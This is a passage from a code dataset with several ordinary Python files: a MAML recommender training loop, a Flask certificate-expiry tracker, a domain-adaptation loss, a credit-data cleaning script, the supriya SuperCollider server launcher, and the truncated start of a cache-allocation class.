valid_iterators[mkt_idx] = iter(dataloaders.get_valid_dataloader(mkt_idx, \"valid\"))\n n_iterations[mkt_idx] = len(train_dl)\n\n # since 2 batches are extracted at a time\n n_iterations = int(min(n_iterations.values()) / 2)\n for iter_num in tqdm(range(n_iterations), desc=f\"iter epoch {epoch}\", leave=False):\n opt.zero_grad()\n meta_train_loss = 0.0\n meta_valid_loss = 0.0\n for mkt in market_index:\n evaluation_error = run_batch(iterators,\n mkt,\n config[\"mkt_idx\"],\n maml,\n config,\n loss_func,\n adaptation_steps,\n train=True)\n\n meta_train_loss += evaluation_error.item()\n\n evaluation_error_val = run_batch(valid_iterators,\n mkt,\n config[\"mkt_idx\"],\n maml,\n config,\n loss_func,\n adaptation_steps,\n train=False)\n\n meta_valid_loss += evaluation_error_val.item()\n\n for p in maml.parameters():\n p.grad.data.mul_(1.0 / len(iterators))\n opt.step()\n\n train_time = time.time() - start_time\n ############\n ## TEST\n ############\n cur_model_results = {}\n\n test_iterators = {}\n test_qrel = {}\n\n valid_iterators = {}\n valid_dataloaders = {}\n test_dataloaders = {}\n valid_qrel = {}\n n_iterations = {}\n for mkt_idx, mkt in market_index.items():\n valid_dataloaders[mkt_idx] = dataloaders.get_valid_dataloader(mkt_idx, \"valid\")\n valid_iterators[mkt_idx] = iter(valid_dataloaders[mkt_idx])\n valid_qrel[mkt_idx] = task_gen_all[mkt_idx].get_validation_qrel(\"valid\")\n\n test_dataloaders[mkt_idx] = dataloaders.get_valid_dataloader(mkt_idx, \"test\")\n test_iterators[mkt_idx] = iter(test_dataloaders[mkt_idx])\n test_qrel[mkt_idx] = task_gen_all[mkt_idx].get_validation_qrel(\"test\")\n\n\n for cur_market in markets:\n market_index_inv = {m: i for (i, m) in market_index.items()}\n mar_index = market_index_inv[cur_market]\n # validation data\n learner = maml.clone()\n\n for test_adapt_step in range(test_adaptation_steps):\n evaluation_error = run_batch(valid_iterators,\n mar_index,\n config[\"mkt_idx\"],\n maml,\n config,\n loss_func,\n adaptation_steps,\n train=False,\n learner=learner)\n\n print(f'test eval on {cur_market} adaptation step: {test_adapt_step}')\n valid_ov, valid_ind = test_model(learner, config, valid_dataloaders[mar_index], valid_qrel[mar_index])\n cur_ndcg = valid_ov['ndcg_cut_10']\n cur_recall = valid_ov['recall_10']\n print(\n f'[pytrec_based] Market: {cur_market} step{test_adapt_step} tgt_valid: \\t NDCG@10: {cur_ndcg} \\t R@10: {cur_recall}')\n\n cur_model_results[f'valid_{cur_market}_step{test_adapt_step}'] = {\n 'agg': valid_ov,\n 'ind': valid_ind,\n }\n\n # test data\n test_ov, test_ind = test_model(learner, config, test_dataloaders[mar_index], test_qrel[mar_index])\n cur_ndcg = test_ov['ndcg_cut_10']\n cur_recall = test_ov['recall_10']\n print(\n f'[pytrec_based] Market: {cur_market} step{test_adapt_step} tgt_test: \\t NDCG@10: {cur_ndcg} \\t R@10: {cur_recall} \\n\\n')\n\n cur_model_results[f'test_{cur_market}_step{test_adapt_step}'] = {\n 'agg': test_ov,\n 'ind': test_ind,\n }\n\n cur_model_results[\"train_time\"] = train_time\n results[args.model_selection] = cur_model_results\n\n ############\n ## SAVE the model\n ############\n if config['save_trained']:\n # model_dir, cid_filename = get_model_cid_dir(args, args.model_selection)\n maml_nmf_output_dir = nmf_model_dir.replace('/', f'/maml{args.batch_size}_')\n save_checkpoint(maml, maml_nmf_output_dir)\n\n os.makedirs(os.path.dirname(args.exp_output), exist_ok=True)\n # writing the results into a file\n results['args'] = vars(args)\n with open(args.exp_output, 'w') as outfile:\n json.dump(results, outfile)\n print('Experiment finished success!')\n","repo_name":"samarthbhargav/efficient-xmrec","sub_path":"train_maml.py","file_name":"train_maml.py","file_ext":"py","file_size_in_byte":15926,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"14631955044","text":"from flask import (\n render_template,\n request,\n render_template,\n flash,\n redirect,\n url_for,\n Blueprint,\n current_app,\n session,\n)\nimport modules.cert.readwrite\nimport modules.cert.checkexpiry\nimport modules.cert.grade_ssllabs\nfrom modules.authentication import validate_user_role\nfrom modules import mail\nimport json\nimport logging\n\ncert_blueprint_routes = Blueprint(\n \"cert_blueprint_routes\",\n __name__,\n template_folder=\"templates\",\n static_folder=\"static\",\n static_url_path=\"cert\",\n)\n\nlogging.getLogger().setLevel(logging.DEBUG)\nlogging.basicConfig(level=logging.DEBUG)\nlogging.captureWarnings(True)\n#LEVEL=\"DEBUG\"\n#logging.getLogger().setLevel(eval(\"logging.\" + LEVEL))\nlogging.info(\"This is from %s and is a INFO message\" % __name__)\nlogging.debug(\"This is from %s and is a DEBUG message\" % __name__)\nlogging.warn(\"This is from %s and is a WARNING message\" % __name__)\n\n@cert_blueprint_routes.route(\"/\")\ndef index():\n try:\n session[\"username\"]\n except:\n flash(\"Not logged in\", \"info\")\n return redirect(url_for(\"login_blueprint_routes.login\"))\n\n logging.debug(\"This is @cert_blueprint_routes.index()\")\n results = request.args.get(\"cert\")\n certs = modules.cert.readwrite.read_records_db()\n return render_template(\"cert/index.html\", results=results, certs=certs)\n\n\n@cert_blueprint_routes.route(\"/add\", methods=[\"GET\", \"POST\"])\ndef add():\n try:\n session[\"username\"]\n except:\n flash(\"Not logged in\", \"info\")\n return redirect(url_for(\"login_blueprint_routes.login\"))\n if not validate_user_role(session[\"username\"], session[\"role\"], \"admin\"):\n flash(f'Your user {session[\"role\"]} is not authorised to add users', \"warning\")\n return redirect(url_for(\"cert_blueprint_routes.index\"))\n cert = {}\n addhelp={}\n if request.method == \"POST\":\n try:\n cert[\"url\"] = request.form[\"url\"]\n except:\n pass\n try:\n cert[\"port\"] = request.form[\"port\"]\n except:\n pass\n addhelp={}\n if ( not request.form[\"url\"] ):\n addhelp[\"url\"]=\"*\"\n if ( not request.form[\"port\"] ):\n addhelp[\"port\"] = \"*\"\n if (\n not request.form[\"url\"]\n or not request.form[\"port\"]\n ):\n flash(\"Please enter all the fields\", \"warning\")\n return render_template(\"cert/add.html\", cert=cert,addhelp=addhelp)\n else:\n cert = {\n \"url\": request.form[\"url\"],\n \"port\": request.form[\"port\"],\n \"contact\": request.form[\"contact\"],\n }\n try:\n daysToGo,expiryDate = modules.cert.checkexpiry.checkcert(cert)\n cert['daysToGo']=daysToGo\n cert['expiryDate']=expiryDate\n if expiryDate == -1 and daysToGo== -1:\n cert['status'] = 'down'\n else: \n cert['status'] = 'up'\n except:\n daysToGo = -1\n cert['status'] = 'down'\n if modules.cert.readwrite.insert_record_db(cert):\n flash(\"Record was successfully added\", 'success')\n else:\n flash(f\"Record {cert} was not added\", 'warning')\n return redirect(url_for(\"cert_blueprint_routes.index\"))\n return render_template(\"cert/add.html\",cert=cert,addhelp=addhelp)\n\n\n@cert_blueprint_routes.route(\"/search\", methods=[\"GET\"])\ndef search():\n logging.getLogger().setLevel(logging.WARN)\n\n try:\n session[\"username\"]\n except:\n flash(\"Not logged in\", \"info\")\n return redirect(url_for(\"login_blueprint_routes.login\"))\n cert={}\n try:\n request.args.get('url')\n cert['url'] = request.args.get('url') \n except: \n flash(\"Please enter a url search string\", \"warning\")\n return redirect(url_for(\"cert_blueprint_routes.index\"),url=None,port=port)\n if request.args.get('port'):\n cert['port'] = request.args.get('port') \n else:\n cert['port'] = \"443\"\n result,count = modules.cert.readwrite.read_record_db(cert)\n logging.debug(f\"debug search {count}, {result}\")\n if count == 1:\n pass\n elif count > 1:\n flash(f\"Multiple records found for {cert['url']}\", \"warning\")\n elif count == 0:\n flash(\"Not found\", \"warning\")\n result = {}\n certs = modules.cert.readwrite.read_records_db()\n return render_template(\"cert/index.html\", result=result, certs=certs)\n\n\n@cert_blueprint_routes.route(\"/edit\", methods=[\"GET\", \"POST\"])\ndef edit():\n try:\n session[\"username\"]\n except:\n flash(\"Not logged in\", \"info\")\n return redirect(url_for(\"login_blueprint_routes.login\"))\n if not validate_user_role(session[\"username\"], session[\"role\"], \"admin\"):\n flash(f'Your user {session[\"role\"]} is not authorised to add users', \"warning\")\n return redirect(url_for(\"cert_blueprint_routes.index\"))\n if request.method == \"GET\":\n cert = { \"url\": request.args.get(\"url\"), \n \"port\": request.args.get(\"port\"),\n \"contact\": request.args.get(\"contact\")\n }\n if request.method == \"POST\":\n cert= {\n \"url\": request.form[\"url\"],\n \"port\": request.form[\"port\"],\n \"contact\": request.form[\"contact\"]\n }\n try:\n request.form[\"update_button\"]\n if request.form[\"update_button\"] == \"update_button\":\n logging.debug(f\"About to update {cert}\")\n if modules.cert.readwrite.update_record_db_ext(cert):\n logging.warning(\"ran the update %s\" % cert)\n flash(f\"Record {cert['url']} was updated \", 'info')\n else:\n logging.debug(\"failed the update db_ext\")\n flash(f\"Error {cert['url']} was not updated\", 'error')\n except:\n pass\n return render_template(\"cert/edit.html\", cert=cert)\n\n\n@cert_blueprint_routes.route(\"/delete\", methods=[\"POST\"])\ndef delete():\n try:\n session[\"username\"]\n except:\n flash(\"Not logged in\", \"info\")\n return redirect(url_for(\"login_blueprint_routes.login\"))\n if not validate_user_role(session[\"username\"], session[\"role\"], \"admin\"):\n flash(f'Your user {session[\"role\"]} is not authorised to add users', \"warning\")\n return redirect(url_for(\"cert_blueprint_routes.index\"))\n cert = {\n \"url\": request.form[\"url\"],\n \"port\": request.form[\"port\"],\n }\n try:\n request.form[\"delete_button\"]\n if request.form[\"delete_button\"] == \"delete_button\":\n logging.debug(\"About to delete %s\" % cert )\n if modules.cert.readwrite.delete_record_db(cert):\n flash(f\"certificate record for {cert['url']}:{cert['port']} was deleted\", \"warning\")\n else:\n logging.debug(\"failed to delete %s \" % cert)\n flash(f\"Error {cert['url']} failed to delete\", \"danger\")\n except:\n pass\n print(\"request.form.delete \", request.form[\"delete\"])\n flash(\"Failed to delete\")\n return redirect(url_for(\"cert_blueprint_routes.index\", cert=cert))\n\n@cert_blueprint_routes.route(\"/check\", methods=[\"POST\"])\ndef check():\n logging.getLogger().setLevel(logging.WARN)\n try:\n session[\"username\"]\n except:\n flash(\"Not logged in\", \"info\")\n return redirect(url_for(\"login_blueprint_routes.login\"))\n if not validate_user_role(session[\"username\"], session[\"role\"], \"admin\"):\n flash(f'Your user {session[\"role\"]} is not authorised to add users', \"warning\")\n return redirect(url_for(\"cert_blueprint_routes.index\"))\n cert = {\n \"url\": request.form[\"url\"],\n \"port\": request.form[\"port\"]\n }\n if request.form[\"check_button\"] == \"check_button\":\n try:\n daysToGo,expiryDate = modules.cert.checkexpiry.checkcert(cert)\n except:\n logging.debug('failed to call checkexpiry')\n flash('Failed to check',\"warning\")\n return redirect(url_for(\"cert_blueprint_routes.index\", cert=cert))\n if daysToGo >=0:\n cert['status'] = \"up\"\n cert['expiryDate'] = expiryDate\n else:\n cert['status'] = \"down\"\n if modules.cert.readwrite.update_record_db_ext(cert):\n logging.debug(\"check(): callling update_record_db_ext %s\" % cert)\n flash(f\"Record {cert['url']} was updated \", 'info')\n else:\n logging.debug(\"failed the update db_ext\")\n flash(f\"Error {cert['url']} was not updated\", 'error')\n return redirect(url_for(\"cert_blueprint_routes.search\", url=cert[\"url\"], port=cert[\"port\"]))\n\n@cert_blueprint_routes.route(\"/checkall\", methods=[\"POST\"])\ndef checkall():\n logging.getLogger().setLevel(logging.WARN)\n try:\n session[\"username\"]\n except:\n flash(\"Not logged in\", \"info\")\n return redirect(url_for(\"login_blueprint_routes.login\"))\n if not validate_user_role(session[\"username\"], session[\"role\"], \"admin\"):\n flash(f'Your user {session[\"role\"]} is not authorised to add users', \"warning\")\n return redirect(url_for(\"cert_blueprint_routes.index\"))\n modules.cert.readwrite.recalculateAll()\n return redirect(url_for(\"cert_blueprint_routes.index\" ))\n\n@cert_blueprint_routes.route(\"/grade\", methods=[\"POST\"])\ndef grade():\n logging.getLogger().setLevel(logging.WARN)\n try:\n session[\"username\"]\n except:\n flash(\"Not logged in\", \"info\")\n return redirect(url_for(\"login_blueprint_routes.login\"))\n if not validate_user_role(session[\"username\"], session[\"role\"], \"admin\"):\n flash(f'Your user {session[\"role\"]} is not authorised to add users', \"warning\")\n return redirect(url_for(\"cert_blueprint_routes.index\"))\n cert = {\n \"url\": request.form[\"url\"],\n \"port\": request.form[\"port\"]\n }\n modules.cert.grade_ssllabs.grade_ssllabs(cert['url'])\n return redirect(url_for(\"cert_blueprint_routes.index\" ))\n\n@cert_blueprint_routes.route(\"/mail\", methods=[\"POST\"])\ndef mail():\n logging.getLogger().setLevel(logging.DEBUG)\n logging.debug(f\"Debug x message from /mail\")\n try:\n session[\"username\"]\n except:\n flash(\"Not logged in\", \"info\")\n return redirect(url_for(\"login_blueprint_routes.login\"))\n if not validate_user_role(session[\"username\"], session[\"role\"], \"admin\"):\n flash(f'Your user {session[\"role\"]} is not authorised to add users', \"warning\")\n return redirect(url_for(\"cert_blueprint_routes.index\"))\n cert = {\n \"url\": request.form[\"url\"],\n \"port\": request.form[\"port\"],\n }\n if request.form[\"mail_button\"] == \"mail_button\":\n result,count = modules.cert.readwrite.read_record_db(cert)\n # read_record can return a dict or a list of dicts, so len of 1 is a dict\n '''\n if count == 1:\n try:\n result['contact'] == \"\"\n except:\n flash(\"There is no contact to mail\",\"warning\")\n return redirect(url_for(\"cert_blueprint_routes.index\" ))\n '''\n for r in result:\n logging.debug(f\"debugging mail {r['contact']}\")\n if r['contact'] != '':\n logging.debug(f\"debugging mail {r}\")\n modules.mail.mail_warning(r['contact'], r['url'], \n r['daysToGo'],\n r['expiryDate'],\n r['port'])\n else:\n flash(f\"No contact to mail for {r['url']}\")\n return redirect(url_for(\"cert_blueprint_routes.index\" ))\n","repo_name":"Fabio-RibeiroB/freecertiffy","sub_path":"flaskapp/flaskapp/cert_blueprint_routes.py","file_name":"cert_blueprint_routes.py","file_ext":"py","file_size_in_byte":11833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16942369140","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\ndef EntropyLoss(input_):\n mask = input_.ge(0.000001)\n mask_out = torch.masked_select(input_, mask)\n entropy = -(torch.sum(mask_out * torch.log(mask_out)))\n return entropy / float(input_.size(0))\n\ndef SAN(input_list, ad_net_list, grl_layer_list, class_weight, use_gpu=True):\n loss = 0\n outer_product_out = torch.bmm(input_list[0].unsqueeze(2), input_list[1].unsqueeze(1))\n batch_size = input_list[0].size(0) // 2\n dc_target = Variable(torch.from_numpy(np.array([[1]] * batch_size + [[0]] * batch_size)).float())\n if use_gpu:\n dc_target = dc_target.cuda()\n for i in range(len(ad_net_list)):\n ad_out = ad_net_list[i](grl_layer_list[i](outer_product_out.narrow(2, i, 1).squeeze(2)))\n loss += nn.BCELoss()(ad_out.view(-1), dc_target.view(-1))\n return loss\n","repo_name":"thuml/SAN","sub_path":"pytorch/src/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"53"} +{"seq_id":"32982987044","text":"#!/usr/bin/env python\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom mmodules.load_Data import _load\n\nsns.set_style(\"darkgrid\", {\"grid.color\": \".6\", \"grid.linestyle\": \":\"})\nsp = {\"end\":\"\\n\\n\\n\", \"sep\":\"\\n\"}\n\ncredit = _load()\n\n# Print a null value column array\nprint(credit.columns[credit.isnull().any()], credit.shape, **sp)\n\n# Print the top five rows with nulls for employment length\nprint(credit[credit[\"person_emp_length\"].isnull()].head(), **sp)\n\n# Impute the null values with the median value for all employment lengths\ncredit['person_emp_length'].fillna((credit['person_emp_length'].median()), inplace=True)\n\n# Create a histogram of employment length\nn, bins, patches = plt.hist(credit[\"person_emp_length\"], bins='auto', color='blue')\nplt.xlabel(\"Person Employment Length\")\nplt.show()\n\n# Print the number of nulls\nprint(credit[\"loan_int_rate\"].isnull().sum(), **sp)\n\n# Store the array on indices\nindices = credit[credit[\"loan_int_rate\"].isnull()].index\n\n# Save the new data without missing data\ncredit_clean = credit.drop(indices)\nprint(credit_clean.shape, **sp)\n\n","repo_name":"jocoder22/TimerSeriesAnalysis","sub_path":"Credit_Risk_Modelling/103_missing_data_handling.py","file_name":"103_missing_data_handling.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72994691049","text":"import asyncio\nimport atexit\nimport enum\nimport logging\nimport os\nimport platform\nimport signal\nimport subprocess\nimport time\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Dict, List, Optional, Tuple\n\nimport uqbar.io\nimport uqbar.objects\n\nfrom .exceptions import ServerCannotBoot\n\nlogger = logging.getLogger(__name__)\n\nDEFAULT_IP_ADDRESS = \"127.0.0.1\"\nDEFAULT_PORT = 57110\nENVAR_SERVER_EXECUTABLE = \"SUPRIYA_SERVER_EXECUTABLE\"\n\n\n@dataclass(frozen=True)\nclass Options:\n \"\"\"\n SuperCollider server options configuration.\n \"\"\"\n\n ### CLASS VARIABLES ###\n\n audio_bus_channel_count: int = 1024\n block_size: int = 64\n buffer_count: int = 1024\n control_bus_channel_count: int = 16384\n executable: Optional[str] = None\n hardware_buffer_size: Optional[int] = None\n initial_node_id: int = 1000\n input_bus_channel_count: int = 8\n input_device: Optional[str] = None\n input_stream_mask: str = \"\"\n ip_address: str = DEFAULT_IP_ADDRESS\n load_synthdefs: bool = True\n maximum_logins: int = 1\n maximum_node_count: int = 1024\n maximum_synthdef_count: int = 1024\n memory_locking: bool = False\n memory_size: int = 8192\n output_bus_channel_count: int = 8\n output_device: Optional[str] = None\n output_stream_mask: str = \"\"\n password: Optional[str] = None\n port: int = DEFAULT_PORT\n protocol: str = \"udp\"\n random_number_generator_count: int = 64\n remote_control_volume: bool = False\n realtime: bool = True\n restricted_path: Optional[str] = None\n sample_rate: Optional[int] = None\n threads: Optional[int] = None\n ugen_plugins_path: Optional[str] = None\n verbosity: int = 0\n wire_buffer_count: int = 64\n zero_configuration: bool = False\n\n ### INITIALIZER ###\n\n def __post_init__(self):\n if self.input_bus_channel_count is None:\n object.__setattr__(self, \"input_bus_channel_count\", 8)\n if self.output_bus_channel_count is None:\n object.__setattr__(self, \"output_bus_channel_count\", 8)\n if self.input_bus_channel_count < 0:\n raise ValueError(self.input_bus_channel_count)\n if self.output_bus_channel_count < 0:\n raise ValueError(self.output_bus_channel_count)\n if self.audio_bus_channel_count < (\n self.input_bus_channel_count + self.output_bus_channel_count\n ):\n raise ValueError(\"Insufficient audio buses\")\n\n ### CLASS VARIABLES ###\n\n def __repr__(self):\n return uqbar.objects.get_repr(self, multiline=True, suppress_defaults=False)\n\n def __iter__(self):\n return (arg for arg in self.serialize())\n\n ### PUBLIC METHODS ###\n\n def get_audio_bus_ids(self, client_id: int) -> Tuple[int, int]:\n audio_buses_per_client = (\n self.private_audio_bus_channel_count // self.maximum_logins\n )\n minimum = self.first_private_bus_id + (client_id * audio_buses_per_client)\n maximum = self.first_private_bus_id + ((client_id + 1) * audio_buses_per_client)\n return minimum, maximum\n\n def get_buffer_ids(self, client_id: int) -> Tuple[int, int]:\n buffers_per_client = self.buffer_count // self.maximum_logins\n minimum = client_id * buffers_per_client\n maximum = (client_id + 1) * buffers_per_client\n return minimum, maximum\n\n def get_control_bus_ids(self, client_id: int) -> Tuple[int, int]:\n control_buses_per_client = self.control_bus_channel_count // self.maximum_logins\n minimum = client_id * control_buses_per_client\n maximum = (client_id + 1) * control_buses_per_client\n return minimum, maximum\n\n def get_sync_ids(self, client_id: int) -> Tuple[int, int]:\n return client_id << 26, (client_id + 1) << 26\n\n def serialize(self) -> List[str]:\n result = [str(find(self.executable))]\n pairs: Dict[str, Optional[str]] = {}\n if self.realtime:\n if self.protocol == \"tcp\":\n pairs[\"-t\"] = str(self.port)\n else:\n pairs[\"-u\"] = str(self.port)\n if self.input_device:\n pairs[\"-H\"] = str(self.input_device)\n if self.output_device != self.input_device:\n result.append(str(self.output_device))\n if self.maximum_logins != 64:\n pairs[\"-l\"] = str(self.maximum_logins)\n if self.password:\n pairs[\"-p\"] = str(self.password)\n if self.sample_rate is not None:\n pairs[\"-S\"] = str(self.sample_rate)\n if not self.zero_configuration:\n pairs[\"-R\"] = \"0\"\n if self.audio_bus_channel_count != 1024:\n pairs[\"-a\"] = str(self.audio_bus_channel_count)\n if self.control_bus_channel_count != 16384:\n pairs[\"-c\"] = str(self.control_bus_channel_count)\n if self.input_bus_channel_count != 8:\n pairs[\"-i\"] = str(self.input_bus_channel_count)\n if self.output_bus_channel_count != 8:\n pairs[\"-o\"] = str(self.output_bus_channel_count)\n if self.buffer_count != 1024:\n pairs[\"-b\"] = str(self.buffer_count)\n if self.maximum_node_count != 1024:\n pairs[\"-n\"] = str(self.maximum_node_count)\n if self.maximum_synthdef_count != 1024:\n pairs[\"-d\"] = str(self.maximum_synthdef_count)\n if self.block_size != 64:\n pairs[\"-z\"] = str(self.block_size)\n if self.hardware_buffer_size is not None:\n pairs[\"-Z\"] = str(self.hardware_buffer_size)\n if self.memory_size != 8192:\n pairs[\"-m\"] = str(self.memory_size)\n if self.random_number_generator_count != 64:\n pairs[\"-r\"] = str(self.random_number_generator_count)\n if self.wire_buffer_count != 64:\n pairs[\"-w\"] = str(self.wire_buffer_count)\n if not self.load_synthdefs:\n pairs[\"-D\"] = \"0\"\n if self.input_stream_mask:\n pairs[\"-I\"] = str(self.input_stream_mask)\n if self.output_stream_mask:\n pairs[\"-O\"] = str(self.output_stream_mask)\n if 0 < self.verbosity:\n pairs[\"-v\"] = str(self.verbosity)\n if self.restricted_path is not None:\n pairs[\"-P\"] = str(self.restricted_path)\n if self.memory_locking:\n pairs[\"-L\"] = None\n if self.ugen_plugins_path:\n pairs[\"-U\"] = str(self.ugen_plugins_path)\n if self.threads and find(self.executable).stem == \"supernova\":\n pairs[\"-t\"] = str(self.threads)\n for key, value in sorted(pairs.items()):\n result.extend([key, value] if value is not None else [key])\n return result\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def first_private_bus_id(self):\n return self.output_bus_channel_count + self.input_bus_channel_count\n\n @property\n def private_audio_bus_channel_count(self):\n return (\n self.audio_bus_channel_count\n - self.input_bus_channel_count\n - self.output_bus_channel_count\n )\n\n\ndef find(scsynth_path=None):\n \"\"\"\n Find the ``scsynth`` executable.\n\n The following paths, if defined, will be searched (prioritised as ordered):\n\n 1. The absolute path ``scsynth_path``\n 2. The environment variable ``SUPRIYA_SERVER_EXECUTABLE`` (pointing to the `scsynth`\n binary)\n 3. The user's ``PATH``\n 4. Common installation directories of the SuperCollider application.\n\n Returns a path to the ``scsynth`` executable. Raises ``RuntimeError`` if no path is\n found.\n \"\"\"\n path = Path(scsynth_path or os.environ.get(ENVAR_SERVER_EXECUTABLE) or \"scsynth\")\n if path.is_absolute() and uqbar.io.find_executable(str(path)):\n return path\n path_candidates = uqbar.io.find_executable(path.name)\n if path_candidates:\n return Path(path_candidates[0])\n paths = []\n executable = scsynth_path or \"scsynth\"\n if Path(executable).stem == \"supernova\":\n executable = \"supernova\"\n system = platform.system()\n if system == \"Linux\":\n paths.extend(\n [Path(\"/usr/bin/\" + executable), Path(\"/usr/local/bin/\" + executable)]\n )\n elif system == \"Darwin\":\n paths.append(\n Path(\"/Applications/SuperCollider.app/Contents/Resources/\" + executable)\n )\n elif system == \"Windows\":\n paths.extend(\n Path(r\"C:\\Program Files\").glob(r\"SuperCollider*\\\\\" + executable + \".exe\")\n )\n for path in paths:\n if path.exists():\n return path\n raise RuntimeError(\"Failed to locate executable\")\n\n\ndef kill():\n with subprocess.Popen(\n [\"ps\", \"-Af\"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT\n ) as process:\n output = process.stdout.read()\n for line in output.decode().splitlines():\n parts = line.split()\n if not any(part in [\"supernova\", \"scsynth\"] for part in parts):\n continue\n pid = int(parts[1])\n os.kill(pid, signal.SIGKILL)\n\n\nclass LineStatus(enum.IntEnum):\n CONTINUE = 0\n READY = 1\n ERROR = 2\n\n\nclass ProcessProtocol:\n def __init__(self):\n self.is_running = False\n\n def boot(self, options: Options):\n raise NotImplementedError\n\n def quit(self):\n raise NotImplementedError\n\n def _handle_line(self, line):\n if line.startswith(\"late:\"):\n logger.warning(f\"Received: {line}\")\n elif \"error\" in line.lower() or \"exception\" in line.lower():\n logger.error(f\"Received: {line}\")\n else:\n logger.info(f\"Received: {line}\")\n if line.startswith((\"SuperCollider 3 server ready\", \"Supernova ready\")):\n return LineStatus.READY\n elif line.startswith((\"Exception\", \"ERROR\", \"*** ERROR\")):\n return LineStatus.ERROR\n return LineStatus.CONTINUE\n\n\nclass SyncProcessProtocol(ProcessProtocol):\n def __init__(self):\n super().__init__()\n atexit.register(self.quit)\n\n def boot(self, options: Options):\n if self.is_running:\n return\n try:\n logger.info(\"Boot: {}\".format(*options))\n self.process = subprocess.Popen(\n list(options),\n stderr=subprocess.STDOUT,\n stdout=subprocess.PIPE,\n start_new_session=True,\n )\n start_time = time.time()\n timeout = 10\n while True:\n line = self.process.stdout.readline().decode().rstrip() # type: ignore\n if not line:\n continue\n line_status = self._handle_line(line)\n if line_status == LineStatus.READY:\n break\n elif line_status == LineStatus.ERROR:\n raise ServerCannotBoot(line)\n elif (time.time() - start_time) > timeout:\n raise ServerCannotBoot(line)\n self.is_running = True\n except ServerCannotBoot:\n self.process.terminate()\n self.process.wait()\n raise\n\n def quit(self) -> None:\n if not self.is_running:\n return\n self.process.terminate()\n self.process.wait()\n self.is_running = False\n\n\nclass AsyncProcessProtocol(asyncio.SubprocessProtocol, ProcessProtocol):\n ### INITIALIZER ###\n\n def __init__(self):\n ProcessProtocol.__init__(self)\n asyncio.SubprocessProtocol.__init__(self)\n self.boot_future = asyncio.Future()\n self.exit_future = asyncio.Future()\n self.error_text = \"\"\n\n ### PUBLIC METHODS ###\n\n async def boot(self, options: Options):\n logger.info(\"Booting ...\")\n if self.is_running:\n logger.info(\"... already booted!\")\n return\n self.is_running = False\n loop = asyncio.get_running_loop()\n self.boot_future = loop.create_future()\n self.exit_future = loop.create_future()\n self.error_text = \"\"\n self.buffer_ = \"\"\n _, _ = await loop.subprocess_exec(\n lambda: self, *options, stdin=None, stderr=None\n )\n if not (await self.boot_future):\n raise ServerCannotBoot(self.error_text)\n\n def connection_made(self, transport):\n logger.info(\"Connection made!\")\n self.is_running = True\n self.transport = transport\n\n def pipe_connection_lost(self, fd, exc):\n logger.info(\"Pipe connection lost!\")\n\n def pipe_data_received(self, fd, data):\n # *nix and OSX return full lines,\n # but Windows will return partial lines\n # which obligates us to reconstruct them.\n text = self.buffer_ + data.decode().replace(\"\\r\\n\", \"\\n\")\n if \"\\n\" in text:\n text, _, self.buffer_ = text.rpartition(\"\\n\")\n for line in text.splitlines():\n line_status = self._handle_line(line)\n if line_status == LineStatus.READY:\n self.boot_future.set_result(True)\n logger.info(\"... booted!\")\n elif line_status == LineStatus.ERROR:\n if not self.boot_future.done():\n self.boot_future.set_result(False)\n self.error_text = line\n logger.info(\"... failed to boot!\")\n else:\n self.buffer_ = text\n\n def process_exited(self):\n logger.info(f\"Process exited with {self.transport.get_returncode()}.\")\n self.is_running = False\n try:\n self.exit_future.set_result(None)\n if not self.boot_future.done():\n self.boot_future.set_result(False)\n except asyncio.exceptions.InvalidStateError:\n pass\n\n async def quit(self):\n logger.info(\"Quitting ...\")\n if not self.is_running:\n logger.info(\"... already quit!\")\n return\n self.is_running = False\n self.transport.close()\n await self.exit_future\n logger.info(\"... quit!\")\n\n\nclass AsyncNonrealtimeProcessProtocol(asyncio.SubprocessProtocol):\n def __init__(self, exit_future: asyncio.Future) -> None:\n self.buffer_ = \"\"\n self.exit_future = exit_future\n\n async def run(self, command: List[str], render_directory_path: Path) -> None:\n logger.info(f\"Running: {' '.join(command)}\")\n _, _ = await asyncio.get_running_loop().subprocess_exec(\n lambda: self,\n *command,\n stdin=None,\n stderr=None,\n start_new_session=True,\n cwd=render_directory_path,\n )\n\n def handle_line(self, line: str) -> None:\n logger.debug(f\"Received: {line}\")\n\n def connection_made(self, transport):\n logger.debug(\"Connecting\")\n self.transport = transport\n\n def pipe_data_received(self, fd, data):\n logger.debug(f\"Data: {data}\")\n # *nix and OSX return full lines,\n # but Windows will return partial lines\n # which obligates us to reconstruct them.\n text = self.buffer_ + data.decode().replace(\"\\r\\n\", \"\\n\")\n if \"\\n\" in text:\n text, _, self.buffer_ = text.rpartition(\"\\n\")\n for line in text.splitlines():\n self.handle_line(line)\n else:\n self.buffer_ = text\n\n def process_exited(self):\n logger.debug(f\"Exiting with {self.transport.get_returncode()}\")\n self.exit_future.set_result(self.transport.get_returncode())\n","repo_name":"josiah-wolf-oberholtzer/supriya","sub_path":"supriya/scsynth.py","file_name":"scsynth.py","file_ext":"py","file_size_in_byte":15426,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"53"} +{"seq_id":"17759254894","text":"from src.server import Server\nfrom typing import List, Dict\nfrom src.utils import find_tail_latency\n\n\"\"\"\n The RobinHood class is responsible to manage all the robinhood functionalities.\n It'll contain info for all servers who are associated with this instance. \n\"\"\"\n\n\nclass RobinHood:\n def __init__(self, cache_memory_limit: int, server_list: List[Server]):\n self.cache_memory_limit = cache_memory_limit\n self.cache_memory_used = 0\n self.server_list = server_list\n self.server_map: Dict[str, Server] = {}\n self.overall_tail_latency = 0\n\n avg_cache_hit_ratio = 100/len(server_list)\n \n for server in server_list:\n self.server_map[server.server_name] = server\n server.cache_hit_percentage = avg_cache_hit_ratio\n self.current_cache_allocation()\n \n def add_server_latency(self, server_name, new_latency):\n print(f\"add_server_latency for {server_name} with 